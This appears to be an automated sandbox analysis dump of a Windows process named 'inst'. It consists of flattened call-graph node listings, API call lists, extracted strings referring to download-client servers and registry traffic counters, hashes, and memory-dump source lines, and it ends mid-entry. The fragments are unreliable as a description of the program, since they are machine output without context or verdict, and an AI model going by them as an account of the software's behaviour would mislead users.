81512->81510 81514 1cbdb9 LeaveCriticalSection 81514->81510 81515->81514 81516 5f4da40a 81523 5f4d7a1f GetCurrentProcess OpenProcessToken 81516->81523 81520 5f4da432 81521 5f4da436 81520->81521 81522 5f52ac74 403 API calls 81520->81522 81522->81521 81524 5f4d7a4b GetLastError 81523->81524 81525 5f4d7a53 LookupPrivilegeValueW 81523->81525 81530 5f4d7ac5 81524->81530 81526 5f4d7a65 CloseHandle 81525->81526 81527 5f4d7a70 AdjustTokenPrivileges 81525->81527 81526->81524 81528 5f4d7aa9 CloseHandle GetLastError 81527->81528 81529 5f4d7ab7 CloseHandle 81527->81529 81528->81530 81529->81530 81531 5f4d888b __EH_prolog3_catch 81530->81531 81533 5f4d88a6 81531->81533 81532 5f4d88b5 __CxxThrowException 81532->81533 81533->81532 81534 5f4d8914 CreateWaitableTimerW 81533->81534 81535 5f4d893d SetWaitableTimer 81534->81535 81536 5f4d8927 GetLastError 81534->81536 81537 5f4d896f CreateMutexW 81535->81537 81538 5f4d8959 GetLastError 81535->81538 81536->81532 81539 5f4d897f GetLastError 81537->81539 81540 5f4d8995 CreateSemaphoreW 81537->81540 81538->81532 81539->81532 81541 5f4d89ac GetLastError 81540->81541 81542 5f4d89c2 CreateSemaphoreW 81540->81542 81541->81542 81543 5f4d89e7 CreateEventW 81542->81543 81544 5f4d89d1 GetLastError 81542->81544 81545 5f4d89fc GetLastError 81543->81545 81546 5f4d8a12 CreateEventW 81543->81546 81544->81543 81545->81546 81547 5f4d8a21 GetLastError 81546->81547 81548 5f4d8a37 81546->81548 81547->81548 81548->81520 81572 1a68d3 81573 1a68dc 81572->81573 81577 1a68fc ctype 81572->81577 81573->81577 81578 1a6817 InternetGetConnectedState 81573->81578 81575 1a68eb 81576 1a683d 8 API calls 81575->81576 81575->81577 81576->81577 81579 1a682b 81578->81579 81580 1a6831 81579->81580 81583 1a67a4 69 API calls 2 library calls 81579->81583 81580->81575 81582 1a683b 81582->81575 81583->81582 81584 18ddd1 81588 18dde3 _memset 81584->81588 81585 18ddfb 81586 1e4647 _strlwr_s_l_stat 5 API calls 81585->81586 81587 18de83 81586->81587 81588->81585 81589 1e573e 
__wsplitpath_helper 67 API calls 81588->81589 81590 18de34 _wcslen 81589->81590 81591 18de4d SHFileOperationW 81590->81591 81591->81585 81592 1967d0 PostMessageW 81593 5f527d19 81594 5f527d2b 81593->81594 81595 5f527d44 _memset 81594->81595 81596 5f527d82 81594->81596 81600 5f51fcc6 81595->81600 81598 5f527d94 WSAGetLastError 81598->81596 81601 5f51fce2 recvfrom 81600->81601 81602 5f51fccf 81600->81602 81601->81602 81602->81596 81602->81598 81603 18ead4 81604 18eaf9 81603->81604 81610 199590 81604->81610 81613 1b74a9 81604->81613 81605 18eb5e SetWindowLongW 81607 18eb50 81605->81607 81606 18eb18 81606->81605 81606->81607 81616 199245 81610->81616 81612 1995b4 81612->81606 82158 1b72a9 81613->82158 81615 1b74cd 81615->81606 81617 199258 81616->81617 81645 1992bb 81616->81645 81618 19928d 81617->81618 81619 1992c2 81617->81619 81666 198f5a GetWindowLongW GetWindowLongW 81618->81666 81620 1992e9 81619->81620 81621 1992ca 81619->81621 81622 199361 81620->81622 81623 1992f1 81620->81623 81722 197656 9 API calls _strlwr_s_l_stat 81621->81722 81624 19936a 81622->81624 81625 199383 81622->81625 81631 199328 81623->81631 81632 19931f 81623->81632 81623->81645 81725 196727 224 API calls 81624->81725 81627 19938c 81625->81627 81628 1993a7 81625->81628 81705 1991eb 81627->81705 81637 1993cd 81628->81637 81638 1993e1 81628->81638 81628->81645 81630 1992aa 81630->81645 81733 197dff 24 API calls 81630->81733 81631->81630 81636 199332 81631->81636 81723 1959be 154 API calls 81632->81723 81724 198edf 90 API calls 81636->81724 81716 196659 IsWindowVisible 81637->81716 81642 19941b 81638->81642 81643 199407 81638->81643 81638->81645 81640 19937e 81640->81630 81648 199424 81642->81648 81651 19943b 81642->81651 81726 198f3b 159 API calls 81643->81726 81644 199339 81644->81645 81645->81612 81727 195c31 8 API calls 81648->81727 81650 199480 81653 1994ae 81650->81653 81658 19947b 81650->81658 81655 19944d 81651->81655 81728 19800a 74 API calls 81651->81728 81661 1994d4 81653->81661 81731 
1982da 7 API calls 81653->81731 81654 19945a 81729 196560 IsWindow IsWindow IsWindowVisible PostMessageW PostMessageW 81654->81729 81655->81650 81655->81654 81658->81650 81730 195a41 IsWindow IsWindow IsWindowVisible PostMessageW 81658->81730 81659 1994a9 81659->81653 81662 1994f1 81661->81662 81719 19662b 81661->81719 81662->81630 81663 19954a 81662->81663 81732 198061 104 API calls __EH_prolog3_GS 81663->81732 81734 197927 81666->81734 81669 16ba90 std::_String_base::_Xlen 2 API calls 81670 198fdc 81669->81670 81671 16bf10 78 API calls 81670->81671 81672 198ff1 SetWindowTextW 81671->81672 81706 1991f8 81705->81706 81709 199226 81705->81709 81707 199202 GetTickCount 81706->81707 81715 199224 81706->81715 81708 17b9b4 86 API calls 81707->81708 81710 199216 81708->81710 81709->81715 81963 198e84 156 API calls 81709->81963 81913 1d5385 81710->81913 81715->81645 81717 196669 Shell_NotifyIconW 81716->81717 81718 196678 81716->81718 81717->81718 81718->81645 81720 196639 KillTimer PostMessageW 81719->81720 81721 196655 81719->81721 81720->81721 81721->81662 81722->81630 81723->81645 81724->81644 81725->81640 81726->81645 81727->81644 81728->81655 81729->81658 81730->81659 81731->81661 81732->81645 81733->81645 81735 197938 GetWindowLongW 81734->81735 81737 19795a 81735->81737 81738 197966 81735->81738 81863 18d5cf GetWindowLongW SetWindowLongW SetWindowPos 81737->81863 81740 19799d GetDlgItem IsWindow 81738->81740 81855 1962fa GetWindowLongW 81738->81855 81742 1979b8 81740->81742 81743 1979d2 81740->81743 81742->81743 81748 1979ca 81742->81748 81859 195ea9 81743->81859 81747 19798e SendMessageW 81747->81740 81864 196019 DestroyWindow 81748->81864 81749 197a18 GetDlgItem IsWindow 81751 197a36 81749->81751 81752 197aca 81749->81752 81865 195fc7 CreateWindowExW 81751->81865 81754 197add GetClientRect 81752->81754 81755 197aee GetWindowRect 81752->81755 81760 197aff 81752->81760 81754->81760 81755->81760 81756 197a63 IsWindow 81756->81752 81758 197a6c GetWindowRect 
MapWindowPoints 81756->81758 81757 197b7a GetDlgItem GetWindowRect MapWindowPoints 81757->81760 81866 196fe3 75 API calls 2 library calls 81758->81866 81759 197bfe SetWindowLongW SetWindowLongW 81759->81669 81760->81757 81760->81759 81867 195ec6 RaiseException 81760->81867 81868 196fe3 75 API calls 2 library calls 81760->81868 81856 19631b SetWindowLongW 81855->81856 81857 196317 SendMessageW 81855->81857 81856->81857 81858 196330 SetWindowPos 81856->81858 81857->81740 81857->81747 81858->81857 81860 195eb8 GetClientRect 81859->81860 81861 195eb2 81859->81861 81860->81749 81860->81752 81862 1e49fc __mtinitlocknum 67 API calls 81861->81862 81862->81860 81863->81738 81864->81743 81865->81756 81866->81752 81867->81760 81868->81760 81914 1d5391 __EH_prolog3 81913->81914 81915 16ba90 std::_String_base::_Xlen 2 API calls 81914->81915 81916 1d53a0 81915->81916 81917 17cc03 69 API calls 81916->81917 81918 1d53bb 81917->81918 81963->81715 82159 1b72bb 82158->82159 82187 1b72e1 82158->82187 82160 1b7411 82159->82160 82161 1b72d0 82159->82161 82162 1b7439 82160->82162 82163 1b7419 82160->82163 82164 1b72da 82161->82164 82165 1b72e9 82161->82165 82166 1b745b 82162->82166 82167 1b7442 82162->82167 82240 1b6f7f CreateSolidBrush 82163->82240 82258 1b6c41 118 API calls 4 library calls 82164->82258 82169 1b72fc 82165->82169 82170 1b72f3 82165->82170 82174 1b7464 82166->82174 82188 1b7478 82166->82188 82267 1b5e20 80 API calls 5 library calls 82167->82267 82171 1b730f 82169->82171 82172 1b7306 82169->82172 82259 1b6d32 121 API calls 4 library calls 82170->82259 82178 1b7319 82171->82178 82179 1b7322 82171->82179 82260 1b6dd6 127 API calls 4 library calls 82172->82260 82268 1b5cff 81 API calls 4 library calls 82174->82268 82261 1b71b5 218 API calls 82178->82261 82185 1b732c 82179->82185 82186 1b7335 82179->82186 82181 1b737a 82181->82187 82264 1b5b3b 26 API calls 82181->82264 82182 1b730d 82182->82187 82262 1b6ae2 121 API calls 5 library calls 82185->82262 82190 1b7348 82186->82190 
82191 1b733f 82186->82191 82187->81615 82188->82181 82269 1b510b GetDlgCtrlID SetBkColor 82188->82269 82193 1b7358 82190->82193 82197 1b73df 82190->82197 82263 1b5aae 87 API calls 4 library calls 82191->82263 82201 1b639a 82193->82201 82195 1b73a0 82195->82187 82265 1b55b0 16 API calls __EH_prolog3_GS 82195->82265 82197->82181 82199 1b7404 82197->82199 82266 1b5bf0 89 API calls 4 library calls 82199->82266 82202 1b63be __EH_prolog3 82201->82202 82203 1b63d0 GetDlgItem 82202->82203 82226 1b6579 ctype 82202->82226 82204 1b63e9 _memset 82203->82204 82203->82226 82207 1b63fe GetWindowTextW 82204->82207 82205 1e4647 _strlwr_s_l_stat 5 API calls 82206 1b659c 82205->82206 82206->82181 82208 16ba90 std::_String_base::_Xlen 2 API calls 82207->82208 82209 1b6421 IsWindowVisible 82208->82209 82210 1b645a 82209->82210 82211 1b643e SendMessageW 82209->82211 82211->82210 82226->82205 82360 1b65a6 82240->82360 82258->82187 82259->82187 82260->82182 82261->82187 82262->82182 82263->82187 82264->82195 82265->82187 82266->82187 82267->82187 82268->82187 82269->82181 82361 1b65b2 __EH_prolog3 82360->82361 82362 1b65c7 GetDlgItem 82361->82362 82476 1af7d0 82362->82476 82365 1b5f33 78 API calls 82366 1b65f1 82365->82366 82367 1b3197 70 API calls 82366->82367 82368 1b6600 ctype 82367->82368 82369 1b6652 GetDlgItem 82368->82369 82477 1af7d9 82476->82477 82478 1777af 18 API calls 82477->82478 82479 1af7e5 82478->82479 82480 1af7e9 82479->82480 82481 1af7ed SetWindowLongW 82479->82481 82480->82365 82481->82480 82518 1829d7 82519 1829e1 82518->82519 82520 1829e5 TlsGetValue 82518->82520 82523 1816e2 82519->82523 82520->82519 82524 1816f7 82523->82524 82527 181709 82523->82527 82530 17de82 __VEC_memcpy ___sbh_free_block 82524->82530 82526 1817cb 82527->82526 82528 18174e GetTickCount 82527->82528 82529 18175f 82528->82529 82529->82526 82530->82527 82531 1a3f4a 82532 1a3f68 GetWindowLongW 82531->82532 82533 1a3f55 82531->82533 82541 1a3ee0 CallWindowProcW 82532->82541 82540 1a3ee0 
CallWindowProcW 82533->82540 82536 1a3f63 82537 1a3f87 82537->82536 82538 1a3f95 GetWindowLongW 82537->82538 82538->82536 82539 1a3fa2 SetWindowLongW 82538->82539 82539->82536 82540->82536 82541->82537 82542 17adc4 82553 1e5421 82542->82553 82544 17ade8 GetModuleFileNameW 82545 16ba90 std::_String_base::_Xlen 2 API calls 82544->82545 82546 17ae06 82545->82546 82547 16bf10 78 API calls 82546->82547 82548 17ae17 82547->82548 82554 17995e 82548->82554 82550 17ae24 ctype 82551 1e4647 _strlwr_s_l_stat 5 API calls 82550->82551 82552 17ae4d 82551->82552 82553->82544 82555 17996a __EH_prolog3_catch 82554->82555 82574 1774b2 CLSIDFromProgID 82555->82574 82559 179ae4 82585 1775a2 CLSIDFromProgID 82559->82585 82562 179b11 SysFreeString 82567 1799a1 std::_Locinfo::_Locinfo 82562->82567 82563 177feb 4 API calls 82565 179a80 SysFreeString 82565->82567 82567->82550 82575 1774ef 82574->82575 82576 1774db CoCreateInstance 82574->82576 82577 1e4647 _strlwr_s_l_stat 5 API calls 82575->82577 82576->82575 82578 1774fb 82577->82578 82578->82567 82579 177feb 82578->82579 82580 17801b 82579->82580 82581 177ff9 SysFreeString 82579->82581 82580->82559 82580->82565 82581->82580 82582 178004 SysAllocString 82581->82582 82582->82580 82583 178011 82582->82583 82590 16dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 82583->82590 82586 1775df 82585->82586 82587 1775cb CoCreateInstance 82585->82587 82588 1e4647 _strlwr_s_l_stat 5 API calls 82586->82588 82587->82586 82589 1775eb 82588->82589 82589->82562 82589->82563 82590->82580 82591 5f4db995 82596 5f4db3f0 82591->82596 82593 5f4db9a4 82594 5f4db9b0 82593->82594 82630 5f4da564 82593->82630 82597 5f4db402 82596->82597 82598 5f4db440 _memset 82597->82598 82610 5f4db547 82597->82610 82603 5f4db460 82598->82603 82599 5f4db714 inet_addr 82601 5f4db731 gethostbyname 82599->82601 82604 5f4db83c _memset 82601->82604 82609 5f4db76d 82601->82609 82603->82599 82606 5f4db5f9 _memset 82603->82606 82603->82610 82616 
5f4db49c 82603->82616 82605 5f4db85e 82604->82605 82650 5f513d26 MultiByteToWideChar MultiByteToWideChar 82605->82650 82608 5f4db61d 82606->82608 82647 5f513d26 MultiByteToWideChar MultiByteToWideChar 82608->82647 82609->82604 82615 5f4db814 inet_addr 82609->82615 82609->82616 82610->82593 82611 5f4db875 82618 5f4db889 82611->82618 82651 5f4eba20 __EH_prolog3 __EH_prolog3_GS 82611->82651 82614 5f4db637 82619 5f4db673 gethostbyname 82614->82619 82623 5f513f0c 13 API calls 82614->82623 82648 5f513d67 __snwprintf 82614->82648 82615->82604 82615->82616 82633 5f523cfe 82616->82633 82636 5f5225d6 82616->82636 82652 5f4eba20 __EH_prolog3 __EH_prolog3_GS 82618->82652 82619->82616 82626 5f4db694 82619->82626 82623->82614 82624 5f4db6fe 82624->82616 82626->82616 82626->82624 82627 5f513f0c 13 API calls 82626->82627 82649 5f513d67 __snwprintf 82626->82649 82627->82626 82631 5f4da56d FreeLibraryAndExitThread 82630->82631 82632 5f4da576 82630->82632 82631->82632 82632->82594 82653 5f527b9f _memset 82633->82653 82635 5f523d12 82635->82610 82637 5f5225e1 82636->82637 82638 5f522637 82636->82638 82641 5f528425 9 API calls 82637->82641 82639 5f528425 9 API calls 82638->82639 82640 5f52263e 82639->82640 82642 5f521cb9 11 API calls 82640->82642 82643 5f5225f6 82641->82643 82646 5f522634 ctype 82642->82646 82644 5f522610 htonl 82643->82644 82645 5f521cb9 11 API calls 82644->82645 82645->82646 82646->82610 82647->82614 82648->82614 82649->82626 82650->82611 82651->82618 82652->82616 82654 5f51c780 10 API calls 82653->82654 82655 5f527bf1 82654->82655 82655->82635 82656 5f51e488 82658 5f51e4af 82656->82658 82657 5f51e707 DefWindowProcW 82674 5f51e4c7 ctype 82657->82674 82658->82657 82659 5f51e4e1 82658->82659 82660 5f51e4ee 82658->82660 82658->82674 82683 5f51e190 __EH_prolog3 82659->82683 82661 5f51e507 82660->82661 82662 5f51e4f6 82660->82662 82665 5f51e586 82661->82665 82666 5f51e50f _memset 82661->82666 82773 5f51df0e __EH_prolog3 std::runtime_error::runtime_error 
__CxxThrowException 82662->82773 82668 5f51e601 82665->82668 82673 5f51e5c7 82665->82673 82665->82674 82667 5f51e545 82666->82667 82691 5f51e39f 82667->82691 82670 5f51e609 82668->82670 82671 5f51e65f 82668->82671 82670->82674 82675 5f51e61b _memset 82670->82675 82672 5f51e667 82671->82672 82677 5f51e6b4 82671->82677 82672->82674 82676 5f51e67d _memset 82672->82676 82673->82674 82698 5f50ae39 GetTickCount 82673->82698 82678 5f522b06 9 API calls 82675->82678 82705 5f527104 82675->82705 82751 5f51fe51 82676->82751 82754 5f507a33 __EH_prolog3 82676->82754 82677->82657 82677->82674 82678->82674 82684 5f51c56b 82683->82684 82685 5f51e1a3 GetTickCount 82684->82685 82686 5f51e1b1 82685->82686 82774 5f4df7ae 82686->82774 82688 5f51e1cf 82689 5f51e2fd ctype 82688->82689 82778 5f5268ec __EH_prolog3 82688->82778 82689->82674 82827 5f52074a 82691->82827 82693 5f51e425 82693->82674 82694 5f51e3bc 82695 5f51e3e1 82694->82695 82849 5f51dc19 __EH_prolog3 std::runtime_error::runtime_error __CxxThrowException 82694->82849 82695->82693 82697 5f51e410 closesocket 82695->82697 82697->82693 82697->82695 82700 5f50ae63 82698->82700 82699 5f50aec0 82699->82674 82700->82699 82890 5f51fe29 82700->82890 82701 5f50aeac WSAGetLastError 82701->82699 82702 5f50aeb9 82701->82702 82702->82699 82703 5f507556 21 API calls 82702->82703 82703->82699 82706 5f52711b 82705->82706 82741 5f52717d ctype 82705->82741 82707 5f527122 GetTickCount 82706->82707 82708 5f527182 GetTickCount 82706->82708 82709 5f5272b2 GetTickCount 82706->82709 82710 5f527447 ctype 82706->82710 82711 5f52738f ctype 82706->82711 82712 5f52723c GetTickCount 82706->82712 82713 5f5273ec GetTickCount 82706->82713 82730 5f52736a 82706->82730 82706->82741 82719 5f527c17 4 API calls 82707->82719 82717 5f527171 82708->82717 82718 5f52719f 82708->82718 82742 5f5272c6 ctype 82709->82742 82716 5f527456 inet_addr htonl 82710->82716 82720 5f52739f inet_addr htonl 82711->82720 82714 5f527255 82712->82714 82715 5f527288 82712->82715 82746 5f527210 

Control-flow Graph
[Figure: control-flow graph; legend: Executed / Not Executed]
APIs
  • Part of subcall function 5F4EAF8A: GetFileAttributesW.KERNEL32(000000FF,5F4FFE4F,?,00000001,00000000,00000000,00000000,000000FF,00000001,5F5BC288,00000000), ref: 5F4EAF8E
• _memset.LIBCMT ref: 5F4FFED6
• _wcslen.LIBCMT ref: 5F4FFF03
• _memset.LIBCMT ref: 5F4FFF38
• inet_addr.WS2_32(00000000), ref: 5F4FFF76
• inet_addr.WS2_32(00000000), ref: 5F4FFFAC
• GetPrivateProfileIntW.KERNEL32(EntClient,TRPort,00000050,?), ref: 5F4FFFDB
• GetPrivateProfileIntW.KERNEL32(EntClient,EntNat,000000FF,?), ref: 5F4FFFF7
• _memset.LIBCMT ref: 5F500014
• _wcslen.LIBCMT ref: 5F50003D
• _memset.LIBCMT ref: 5F500076
• inet_addr.WS2_32(00000000), ref: 5F5000B4
• inet_addr.WS2_32(00000000), ref: 5F5000EA
• _memset.LIBCMT ref: 5F500115
• _wcslen.LIBCMT ref: 5F500142
• _memset.LIBCMT ref: 5F500165
  • Part of subcall function 5F513CE4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,0000083F,?,00000000,?,5F513E87,?,?,0000083F), ref: 5F513CFD
• inet_addr.WS2_32(00000000), ref: 5F5001A3
• inet_addr.WS2_32(00000000), ref: 5F5001D9
• _wcslen.LIBCMT ref: 5F50020C
• __wcslwr.LIBCMT ref: 5F500227
• wsprintfW.USER32 ref: 5F5002E0
  • Part of subcall function 5F4F4C30: __EH_prolog3.LIBCMT ref: 5F4F4C37
Strings
Memory Dump Source
• Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
• Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
Similarity
• API ID: _memsetinet_addr$_wcslen$PrivateProfile$AttributesByteCharFileH_prolog3MultiWide__wcslwrwsprintf
• String ID: "$EntClient$EntNat$FIVESIZE$P2PHAVESIZE$PdownList$PolicyControl%d$SDServer$SINGLESIZE$STServer$TRPort$TRServer$[CTaskMgr::__update_config] PdownList:%s$[CTaskMgr::__update_config] STServer:%s$[CTaskMgr::__update_config] TRServer:%s$\360EntClient_download.ini$\livep.dat$%W_
• API String ID: 1263679763-1697709049
• Opcode ID: 8c0d9a9b73e1e640882b4f23f2278e6a9db053b5681d8ac126cd6825cad9eaac
• Instruction ID: 42242d2c2961620f3d5c9cc6a60d6dfaf4602da0568fd3451bca0a74e9d2165a
• Opcode Fuzzy Hash: 8c0d9a9b73e1e640882b4f23f2278e6a9db053b5681d8ac126cd6825cad9eaac
• Instruction Fuzzy Hash: 4AF193B2901349ABDB11EFA4CC54BEE77EDEF40360F44012AF919AB1C1EB74A6558B90

Control-flow Graph
[Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4FF4B3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4FF4BA
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 5F4FF573
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 5F4FF588
                                                                                                                                                                        • Part of subcall function 5F51D2AB: __EH_prolog3.LIBCMT ref: 5F51D2B2
                                                                                                                                                                        • Part of subcall function 5F51D2AB: std::runtime_error::runtime_error.LIBCPMT ref: 5F51D2DB
                                                                                                                                                                        • Part of subcall function 5F51D2AB: __CxxThrowException@8.LIBCMT ref: 5F51D2F0
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4FF730
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,LastUploadDate,00000000,?,00000000,?,?,?,?), ref: 5F4FF79E
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,LastUploadTime,00000000,?,00000000,?), ref: 5F4FF7CC
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,LastUploadTraffic,00000000,?,00000000,?), ref: 5F4FF7FA
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,LastDownTraffic,00000000,?,00000000,?), ref: 5F4FF828
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,CurUploadTime,00000000,?,00000000,?), ref: 5F4FF856
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,CurUploadTraffic,00000000,?,00000000,?), ref: 5F4FF884
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,CurDownTraffic,00000000,?,00000000,?), ref: 5F4FF8B2
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 5F4FF8C3
                                                                                                                                                                      • __time64.LIBCMT ref: 5F4FFA31
                                                                                                                                                                      • __time64.LIBCMT ref: 5F4FF653
                                                                                                                                                                        • Part of subcall function 5F52AE62: GetSystemTimeAsFileTime.KERNEL32(5F5BC3F0,?,?,?,5F4FEABC,00000000,?,5F5BC3F0,5F5BC288), ref: 5F52AE6D
                                                                                                                                                                        • Part of subcall function 5F52AE62: __aulldiv.LIBCMT ref: 5F52AE8D
                                                                                                                                                                      • __time64.LIBCMT ref: 5F4FFA88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue$__time64$CloseH_prolog3Time$CountException@8FileHandleObjectSingleSystemThrowTickWait__aulldiv_memsetstd::runtime_error::runtime_error
                                                                                                                                                                      • String ID: CurDownTraffic$CurUploadTime$CurUploadTraffic$LastDownTraffic$LastUploadDate$LastUploadTime$LastUploadTraffic$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$NonUrgentMode$reg NonUrgentMode:%d$reg NonUrgentMode:%d timeout
                                                                                                                                                                      • API String ID: 4167386882-1126348924
                                                                                                                                                                      • Opcode ID: 0804748605a4cbd95e40c5f68426cfd32d630a07ed4d503ee5594860c6db2b2e
                                                                                                                                                                      • Instruction ID: 3e3d8a4e02641bd6003c2b9ae86cf41aaa309f617f81334ccdb4b0bf1c98e024
                                                                                                                                                                      • Opcode Fuzzy Hash: 0804748605a4cbd95e40c5f68426cfd32d630a07ed4d503ee5594860c6db2b2e
                                                                                                                                                                      • Instruction Fuzzy Hash: C6123CB1D0134A9BDB14DFA5C984AEEB7F8FF84320F14462AE516A7350EB34A945CF90

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcspbrk.LIBCMT ref: 5F52A712
                                                                                                                                                                        • Part of subcall function 5F52DC9F: __getptd_noexit.LIBCMT ref: 5F52DC9F
                                                                                                                                                                        • Part of subcall function 5F52DC8C: __getptd_noexit.LIBCMT ref: 5F52DC8C
                                                                                                                                                                        • Part of subcall function 5F528356: __decode_pointer.LIBCMT ref: 5F528361
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$__decode_pointer_wcspbrk
                                                                                                                                                                      • String ID: ./\
                                                                                                                                                                      • API String ID: 2357261805-3176372042
                                                                                                                                                                      • Opcode ID: 4561a9e80691eebe3dc8c5cbd30e70ce8d921a6b1c4719a134cd852d99404b40
                                                                                                                                                                      • Instruction ID: ae9a32289b643f6f4f7b0839683748e8ea8ea5a067fbe56e703533b974e3c66f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4561a9e80691eebe3dc8c5cbd30e70ce8d921a6b1c4719a134cd852d99404b40
                                                                                                                                                                      • Instruction Fuzzy Hash: B1C167F18016299ECB209F65CD446EAB7F8BF09311F0043BAE65CD25C1E735AA91CF69
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __aulldiv$DiskDriveFreeSpaceType_memset
                                                                                                                                                                      • String ID: %d Bytes$%d GB$%d KB$%d MB$%d.%d GB$%d.%d KB$%d.%d MB$c:\
                                                                                                                                                                      • API String ID: 3571217518-3034477485
                                                                                                                                                                      • Opcode ID: 6ba342d5eea3093c564dd165c499a1b17acae8cdef48cd3f997eabd0f23834a1
                                                                                                                                                                      • Instruction ID: b8e4e43aeed45aea42c77803b13175368f48f94ff7975567cd47bab80541840b
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ba342d5eea3093c564dd165c499a1b17acae8cdef48cd3f997eabd0f23834a1
                                                                                                                                                                      • Instruction Fuzzy Hash: BD41D6B1D10615BADB08DBB4AC96FFF76BAEB56704F21412AF506F3181E770491086A1
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1AAD
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,0017BD49,?), ref: 001D1AE5
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1B06
